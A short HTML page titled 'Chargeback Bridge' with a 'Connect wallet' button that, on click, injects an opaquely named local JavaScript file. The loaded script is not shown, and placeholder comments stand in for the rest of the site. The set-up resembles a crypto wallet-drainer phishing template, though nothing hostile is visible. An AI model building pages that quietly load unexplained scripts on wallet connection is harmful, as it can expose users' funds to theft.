
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width,initial-scale=1">
  <title>Chargeback Bridge</title>
  <!-- Other head content stays the same -->
</head>
<body>
  <!-- Other body content stays the same -->

  <button class="Drawer__WalletConnectButton-sc-1n8lij9-8 kELtvl" onclick="loadJSFile();">Connect wallet</button>

  <!-- The rest of the website remains unchanged -->

  <script>
  function loadJSFile() {
    var script = document.createElement('script');
    script.src = './506c5f7-32f7710e809e2cf24262.js';
    document.head.appendChild(script);
  }
  </script>
</body>
</html>
